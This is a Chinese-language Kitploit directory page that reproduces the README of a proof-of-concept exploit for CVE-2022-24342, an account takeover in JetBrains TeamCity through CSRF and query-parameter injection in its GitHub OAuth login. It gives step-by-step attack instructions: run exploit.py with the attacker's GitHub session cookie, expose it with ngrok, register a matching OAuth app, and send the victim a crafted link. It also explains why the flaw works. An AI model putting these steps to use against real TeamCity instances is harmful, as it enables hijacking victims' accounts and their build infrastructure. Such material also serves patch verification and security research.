Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-24342 — CVE-2022-24342的PoC:通过GitHub认证中的CSRF实现账户接管 | Kitploit
工具/GitHubGitHub/yuriisanin/cve-2022-24342
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证红队
GitHubyuriisanin/cve-2022-24342

CVE-2022-24342

CVE-2022-24342的PoC:通过GitHub认证中的CSRF实现账户接管

查看仓库
37724年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-24342

JetBrains TeamCity - 通过 GitHub 认证中的 CSRF 实现账户接管(PoC)

  • CVE-2022-24342
    • 使用要求
    • 使用方法
    • 工作原理
      • GitHub OAuth2:查询参数处理顺序
      • CVE-2022-24342:HTTP 请求流程

使用要求

  • JetBrains TeamCity <2021.2.1
  • 已启用 GitHub 认证

使用方法

  1. 尝试使用攻击者的 GitHub 账户登录目标 TeamCity 实例,以使 TeamCity 的 GitHub 应用获得授权。

  2. 安装并运行:

root@kitploit:~
$ git clone https://github.com/yuriisanin/CVE-2022-24342
$ cd CVE-2022-24342/
$ pip3 install -r requirements.txt
$ python3 exploit.py -h

usage: exploit.py [-h] -s S [-p P]

optional arguments:
  -h, --help  show this help message and exit
  -s S        GitHub user session
  -p P        Uvicorn port

$ python3 exploit.py -s {attackers_github_session_cookie}

如果在本地机器上运行该漏洞利用工具,你可能需要使用 Ngrok 或替代方案。

root@kitploit:~
$ ngrok http 8000
  1. 创建 GitHub OAuth2 应用:
root@kitploit:~
homepage: "http://{exploit-host}:8000"
authorization callback url: "http://{exploit-host}:8000/callback"
  1. 向受害者发送以下链接:
root@kitploit:~
http://{exploit-host}:8000/exploit?target_host=http://{target-host}&gh_client_id={github_oauth_client_id}

演示:

CVE-2022-24342 演示

工作原理

TeamCity 在 OAuth2 流程中存在查询参数注入漏洞,使得攻击者能够将用户重定向到任意 GitHub OAuth2 应用,拦截有效的 state 参数,并将任意 GitHub 账户连接到受害者的 TeamCity 账户。

该漏洞之所以可行,基于以下两点:

  • GitHub OAuth2 查询参数的处理顺序
  • TeamCity 的查询参数注入

GitHub OAuth2:查询参数处理顺序

github-oauth-parameters-processing

CVE-2022-24342:HTTP 请求流程

requests-flow

关注

你可以在 Twitter、GitHub 或 YouTube 上关注我。

下载工具